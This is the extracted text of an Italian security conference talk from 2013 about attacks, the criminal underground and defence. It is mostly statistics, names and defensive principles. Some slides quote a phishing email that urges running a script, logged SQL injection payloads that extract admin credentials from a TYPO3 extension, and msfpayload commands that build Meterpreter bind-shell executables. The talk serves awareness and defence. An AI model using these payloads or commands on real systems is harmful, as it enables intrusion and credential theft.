Attacchi, bugie e underground digitale by Andrea Pompili

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

ATTACCHI, BUGIE E UNDERGROUND DIGITALE

Speaker: Andrea Pompili

There are only 10 types of people in the world:

Those who understand binary, and those who don't

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

«

»

> Bonifica e Hardening fatta a tappeto un anno prima

> Sistemi Operativi Patched all’ultima versione disponibile

> Logging integrale di tutte le attività del Sito

> 2 Sistemi IPS (Intrusion Prevention System) in cascata

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Outside 70%

Inside - Accidental 12%

Inside - Malicious 9%

Inside 5%

Unknown 4%

Source: http://datalossdb.org/ Statistiche 2012

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

7,20%

6,20%

6,10%

5,70%

6,80%

6,80%

29,90%

41,20%

27,20%

34,10%

34,10%

30,70%

62,90%

52,60%

66,70%

60,20%

59,10%

62,50%

Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

76,00%

3,80%

16,80%

3,40%

76,00%

6,50%

13,70%

3,80%

76,40%

6,70%

13,70%

3,20%

Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

«Non è obiettivo di questo “focus” riportare in dettaglio i

risultati della rilevazione ma analizzando i dati relativi ai valori

medi per l’intero campione si può ritenere che i risultati siano:

• soddisfacenti per la protezione logica;

• molto soddisfacenti per la sicurezza dell’infrastruttura;

• sufficienti per la sicurezza dei servizi;

• da migliorare per la sicurezza dell’organizzazione.

«Possiamo dire che ce l’aspettavamo»

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Aki Mon Telecom Shane Atkinson

Canter & Siegel

Eddie Davidson

Peter Francis-Macrae

Davis Wolfgang Hawke

Jumpstart Technologies

Vandar Kushnir

Kevin Lipnitz

Wayne Mansfield

Oleg Nikolaenko

Alan Ralsky

Dave Rhodes

Scott Richter

Russian Business Network

iFrame Cash

SBT Telecom Network

Defcon Host

Micronnet Ltd.

InstallsCash

Sendar Argic

Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011

RBNet

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

(*) According to Frank Rieger

Chief technology officer at GSMK

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Source: Vincenzo Iozzo – OWASP Day 2012

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Source: Vincenzo Iozzo – OWASP Day 2012

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

So, how does one get full remote code execution in Chrome? In the case of

Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to

successfully break out of the Chrome sandbox.

(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)

Last year (2011), VUPEN released a video to demonstrate a

successful sandbox escape against Chrome but Google challenged

the validity of that hack, claiming it exploited third-party code,

believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-

sandbox-first-to-fall/10588)

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Blackole Exploit Kit

Cool Exploit Kit

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Da: [email protected]

Inviato: Thursday, November 04, 2004 7:48 PM

A: [email protected]

Oggetto: Aggiornamento configurazione

Salve,

riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di

tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di

aggiornare collegandosi al seguente indirizzo:

http://xxxx.rcs.it/software/av/index.html

La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella

pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo

dell'aggiornamento.

Distinti Saluti

Help Desk - Supporto Tecnico RCS

RCS Editori S.p.A. - Settore Quotidiani

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]

"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"

178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]

"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=

1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,

substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),

floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]

"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=

11502+and(select+1+from(select+count(*),concat_ws(0x3a,

substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),

repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(

rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+"

"Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"

Web Shell Extension

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

http://evader.stonesoft.com/

http://insecure.org/stf/secnet_ids/secnet_ids.html

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

msfpayload windows/meterpreter/bind_tcp X >

moca_x86_tcp_4444.exe

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

msfpayload windows/x64/meterpreter/bind_tcp X >

moca_x64_tcp_4444.exe

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

“The truth is, consumer-grade antivirus products can’t

protect against targeted malware created by well-

resourced nation-states with bulging budgets.

They can protect you against run-of-the-mill malware:

banking trojans, keystroke loggers and e-mail worms.

But targeted attacks like these go to great lengths to

avoid antivirus products on purpose”

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

<#1> Ragiona come un Attaccante in modo da comprendere

cosa faranno e come ti attaccheranno

<#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma

soprattutto i vincoli operativi che hanno

<#3> Identifica il valore «percepito» di ciò che vuoi

difendere, ma soprattutto cosa vuoi difendere

<#4> Lavora su tutto il perimetro di difesa, senza atti di fede

<#5> Se la tua difesa è più economica dell’attacco,

tu sarai sempre in vantaggio

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

Domande? Italian

مطالب أيةArabic

¿Preguntas? Spanish

Questions? English

tupoQghachmey Klingon

Sindarin

Japanese

Ερωτήσεις? Greek

вопросы? Russian